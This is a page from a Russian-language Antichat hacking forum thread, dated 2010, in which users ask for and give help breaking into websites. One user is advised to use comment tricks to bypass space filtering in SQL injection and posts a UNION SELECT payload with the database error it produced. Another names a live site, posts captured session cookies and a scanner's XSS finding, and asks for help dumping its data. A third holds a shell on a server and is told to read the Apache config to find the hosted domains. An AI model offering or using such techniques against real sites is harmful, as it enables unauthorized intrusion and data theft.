HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1428 из 2422 « Первая < 428928132813781418 1424 1425 1426 1427 1428 1429 1430 1431 1432 1438147815281928 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.08.2010, 19:53
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами: 9116636

Репутация: 39
По умолчанию
Привет. Есть уязвимость формата http://domain/'sp%20ace

Ответ:

Код:
Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
Session halted.
Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 03.08.2010, 01:32
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию
Цитата:
Сообщение от roddik  
Привет. Есть уязвимость формата http://domain/'sp%20ace
Ответ:
Код:
Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
Session halted.
Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
заюзай /**/
 
Ответить с цитированием

  #3  
Старый 03.08.2010, 08:28
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию
Цитата:
Сообщение от Ottiko  
Очень вот очень нужна слить
Сайт
Всё что найденно:
спс.Ув. ))
тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
 
Ответить с цитированием

  #4  
Старый 03.08.2010, 09:19
Ottiko
Новичок
Регистрация: 14.09.2009
Сообщений: 2
С нами: 8767233

Репутация: 0
По умолчанию
Цитата:
Сообщение от Gorev  
тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
Через софт поимал вроде куки авторизации пользователя (может админ )

Цитата:
Сообщение от None  
POST http://en.vsbrothers.com/sign-in.html
Cookie: PHPSESSID=40e01aae3404c21c830ee31f58bfbb71
reg[username]=114082&reg[password]=40e01aae3404c21c830ee31f58bfbb71
Это что нибудь даст, или мелочь?

Ещё чита тему Xss для новичков только не очень разобрался...
 
Ответить с цитированием

  #5  
Старый 03.08.2010, 09:43
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию
Цитата:
Сообщение от Ottiko  
Это что нибудь даст, или мелочь?
Это ничего не даст.
 
Ответить с цитированием

  #6  
Старый 03.08.2010, 09:54
Ottiko
Новичок
Регистрация: 14.09.2009
Сообщений: 2
С нами: 8767233

Репутация: 0
По умолчанию
Цитата:
Сообщение от M_script  
Это ничего не даст.
Так вроде сканер нашол XSS уязвимость...

Цитата:
Сообщение от None  
Request: http://en.vsbrothers.com/sign-in.html
Parameter Type: POST
Test Name: Cross-Site Scripting (XSS)
Severity: High
Или я путаю...
 
Ответить с цитированием

  #7  
Старый 03.08.2010, 10:10
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию
Я про куки. Эти куки ничего не дадут.
 
Ответить с цитированием

  #8  
Старый 03.08.2010, 16:43
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
С нами: 9746190

Репутация: 6
По умолчанию
есть шелл на нем лежит несколько сайтов, но папки с сайтами в виде логинов без домена...

Есть какой-нибудь простой способ спалить домены?
 
Ответить с цитированием

  #9  
Старый 03.08.2010, 16:59
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию
Цитата:
Сообщение от InfectedM  
есть шелл на нем лежит несколько сайтов, но папки с сайтами в виде логинов без домена...
Есть какой-нибудь простой способ спалить домены?
Конфиг апача.
 
Ответить с цитированием

  #10  
Старый 04.08.2010, 01:12
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами: 9116636

Репутация: 39
По умолчанию
Цитата:
Сообщение от попугай  
заюзай /**/
Спасибо за идею, я правильно понял?

Код:
http://domain/'/**/union/**/select/**/1,2,3#comment
выводит

Код:
Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
Session halted.
 
Ответить с цитированием
Ответ
Страница 1428 из 2422 « Первая < 428928132813781418 1424 1425 1426 1427 1428 1429 1430 1431 1432 1438147815281928 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.